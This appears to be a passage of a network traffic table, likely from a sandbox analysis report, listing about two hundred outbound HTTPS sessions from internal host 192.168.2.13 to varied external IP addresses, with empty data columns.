                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15451192.168.2.1337342193.66.117.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15452192.168.2.133318042.202.180.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15453192.168.2.1333756110.246.138.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15454192.168.2.1340596217.82.213.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15455192.168.2.134608668.27.237.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15456192.168.2.134917699.245.247.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15457192.168.2.1354172213.19.82.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15458192.168.2.1350940168.153.100.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15459192.168.2.135632668.180.255.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15460192.168.2.1360068188.113.228.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15461192.168.2.135411632.173.156.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15462192.168.2.1339068164.149.246.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15463192.168.2.135049862.5.166.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15464192.168.2.1354864168.89.188.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15465192.168.2.1357388143.10.6.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15466192.168.2.1355484159.164.60.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15467192.168.2.1359744155.127.230.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15468192.168.2.1343986169.237.135.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15469192.168.2.1340632180.47.232.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15470192.168.2.1352078185.205.46.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15471192.168.2.1338764208.81.136.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15472192.168.2.13554044.215.157.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15473192.168.2.133742898.196.59.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15474192.168.2.133914695.124.119.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15475192.168.2.133690851.249.194.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15476192.168.2.134104217.22.37.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15477192.168.2.1333140191.220.160.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15478192.168.2.133376869.221.29.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15479192.168.2.1348590109.82.33.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15480192.168.2.1339614180.222.222.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15481192.168.2.1336146113.233.191.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15482192.168.2.1342804128.109.208.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15483192.168.2.1343504156.98.14.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15484192.168.2.1355350152.167.215.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15485192.168.2.1345106164.109.206.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15486192.168.2.1343002213.24.159.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15487192.168.2.1359978163.247.152.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15488192.168.2.1356434165.85.141.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15489192.168.2.1345516103.21.110.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15490192.168.2.1346444128.142.158.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15491192.168.2.13564429.178.198.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15492192.168.2.1350638165.67.26.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15493192.168.2.1357122193.134.171.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15494192.168.2.1344136130.175.23.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15495192.168.2.1334898201.177.95.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15496192.168.2.134152851.37.149.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15497192.168.2.136038094.233.240.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15498192.168.2.1341284139.127.254.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15499192.168.2.133685294.209.251.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15500192.168.2.1358320193.206.11.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15501192.168.2.1360402210.173.170.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15502192.168.2.1352716103.182.164.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15503192.168.2.1345402119.70.5.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15504192.168.2.1339076219.0.251.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15505192.168.2.1352576222.231.123.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15506192.168.2.134505490.25.212.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15507192.168.2.1347228177.220.82.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15508192.168.2.1356914154.70.109.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15509192.168.2.1334532153.166.160.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15510192.168.2.1341212161.148.79.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15511192.168.2.1352706173.156.15.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15512192.168.2.13512749.2.151.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15513192.168.2.133862831.185.212.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15514192.168.2.134866880.100.58.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15515192.168.2.135213299.151.173.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15516192.168.2.1337130124.77.28.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15517192.168.2.133513495.81.86.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15518192.168.2.135351418.197.222.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15519192.168.2.1358084212.180.195.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15520192.168.2.1342456205.177.233.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15521192.168.2.135598623.42.31.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15522192.168.2.1336560207.198.138.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15523192.168.2.134746082.137.229.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15524192.168.2.134258023.117.95.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15525192.168.2.1333154209.166.197.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15526192.168.2.1356480185.121.179.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15527192.168.2.135948641.232.171.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15528192.168.2.13412088.129.99.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15529192.168.2.1344784105.50.118.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15530192.168.2.133920042.81.114.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15531192.168.2.13337009.191.255.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15532192.168.2.134569493.69.179.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15533192.168.2.1355666107.69.130.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15534192.168.2.135861837.101.55.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15535192.168.2.134993614.126.166.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15536192.168.2.1340398188.83.156.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15537192.168.2.134232838.158.154.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15538192.168.2.134162092.90.34.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15539192.168.2.135305892.239.97.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15540192.168.2.133473879.124.150.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15541192.168.2.134459424.15.220.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15542192.168.2.133456635.12.129.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15543192.168.2.1346252210.168.116.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15544192.168.2.1342934104.90.135.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15545192.168.2.1352796143.255.19.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15546192.168.2.1358152108.244.92.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15547192.168.2.135996079.184.208.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15548192.168.2.1334180195.16.95.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15549192.168.2.1340604221.124.195.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15550192.168.2.1349022144.241.118.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15551192.168.2.135830852.159.95.1798080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15552192.168.2.1335880139.64.165.408080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15553192.168.2.135670031.13.55.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15554192.168.2.1356314175.204.39.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15555192.168.2.1351314104.195.64.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15556192.168.2.133638654.132.191.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15557192.168.2.133584627.49.238.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15558192.168.2.1356246137.87.105.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15559192.168.2.1348570204.194.46.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15560192.168.2.1345790148.220.32.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15561192.168.2.135731885.117.98.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15562192.168.2.1359168217.96.116.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15563192.168.2.1355040195.1.160.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15564192.168.2.1350308113.233.174.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15565192.168.2.1353932117.59.40.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15566192.168.2.1351836113.52.107.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15567192.168.2.136064049.198.34.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15568192.168.2.133378493.215.212.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15569192.168.2.1355660113.218.175.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15570192.168.2.134850245.187.210.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15571192.168.2.1340696136.111.22.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15572192.168.2.1348604159.13.9.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15573192.168.2.1337058205.36.194.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15574192.168.2.1334980216.128.210.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15575192.168.2.135819249.75.99.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15576192.168.2.1344624141.208.36.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15577192.168.2.1342456164.62.133.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15578192.168.2.1337684190.16.79.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15579192.168.2.1335210210.137.77.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15580192.168.2.1350522216.86.217.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15581192.168.2.134042693.109.24.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15582192.168.2.133509654.235.71.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15583192.168.2.135098077.207.226.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15584192.168.2.1346084109.200.148.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15585192.168.2.1355646195.65.172.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15586192.168.2.133674292.23.182.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15587192.168.2.1360864116.222.20.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15588192.168.2.1347730187.116.53.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15589192.168.2.1356906126.32.151.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15590192.168.2.1343626207.205.56.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15591192.168.2.1342666163.146.115.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15592192.168.2.1343370212.47.4.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15593192.168.2.1353888193.7.229.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15594192.168.2.1354186196.153.53.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15595192.168.2.135253280.58.218.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15596192.168.2.1358652179.70.241.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15597192.168.2.134703241.97.142.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15598192.168.2.135852048.189.150.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15599192.168.2.1335962191.54.186.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15600192.168.2.136040820.69.167.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15601192.168.2.1358220147.21.109.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15602192.168.2.1356768166.30.74.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15603192.168.2.1333854169.236.201.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15604192.168.2.1356700133.200.61.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15605192.168.2.134682053.230.80.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15606192.168.2.1352612190.115.127.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15607192.168.2.1350182217.169.65.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15608192.168.2.1344520130.220.219.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15609192.168.2.1357438108.93.134.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15610192.168.2.1352044101.70.86.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15611192.168.2.134534827.178.54.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15612192.168.2.134647295.194.90.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15613192.168.2.135112634.136.25.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15614192.168.2.1344840175.239.246.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15615192.168.2.1343918141.169.218.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15616192.168.2.1342650194.79.230.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15617192.168.2.135580675.119.44.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15618192.168.2.1337042120.250.57.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15619192.168.2.136025639.231.191.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15620192.168.2.134577257.127.79.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15621192.168.2.134573054.98.210.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15622192.168.2.1352888204.238.95.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15623192.168.2.1337410155.86.50.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15624192.168.2.1359038115.82.125.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15625192.168.2.1346770113.87.23.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15626192.168.2.134968224.176.229.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15627192.168.2.133404057.124.122.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15628192.168.2.1359604108.106.11.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15629192.168.2.135599083.194.9.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15630192.168.2.1338032120.217.167.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15631192.168.2.1350722188.191.135.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15632192.168.2.1353872196.26.138.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15633192.168.2.1357080188.132.200.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15634192.168.2.1353784105.158.39.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15635192.168.2.1360652205.238.185.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15636192.168.2.1340306141.233.217.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15637192.168.2.1347912152.222.138.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15638192.168.2.1351168114.112.28.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15639192.168.2.136022838.4.152.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15640192.168.2.133838847.198.190.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15641192.168.2.135296294.190.210.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15642192.168.2.1352246174.29.215.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15643192.168.2.1354298149.239.220.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15644192.168.2.1351002156.203.208.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15645192.168.2.1341044158.213.132.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15646192.168.2.1335222120.135.112.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15647192.168.2.134240690.224.69.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15648192.168.2.1353702193.172.81.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15649192.168.2.1336714113.230.105.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15650192.168.2.1360914210.117.119.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15651192.168.2.134085832.20.174.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15652192.168.2.1358612197.12.17.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15653192.168.2.1356124196.3.25.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15654192.168.2.1356242202.95.45.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15655192.168.2.1358466103.25.113.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15656192.168.2.13541988.218.35.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15657192.168.2.1333946188.46.17.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15658192.168.2.135355877.107.203.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15659192.168.2.1337544173.35.208.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15660192.168.2.135190442.86.229.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15661192.168.2.1340604104.136.253.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15662192.168.2.1340148151.170.243.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15663192.168.2.1350314149.102.41.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15664192.168.2.135648451.6.54.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15665192.168.2.135460047.37.103.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15666192.168.2.134262891.227.224.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15667192.168.2.134068474.152.164.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15668192.168.2.1336942162.40.30.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15669192.168.2.134209677.38.65.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15670192.168.2.1333482179.86.178.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15671192.168.2.1349294206.136.32.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15672192.168.2.135235281.243.109.194443
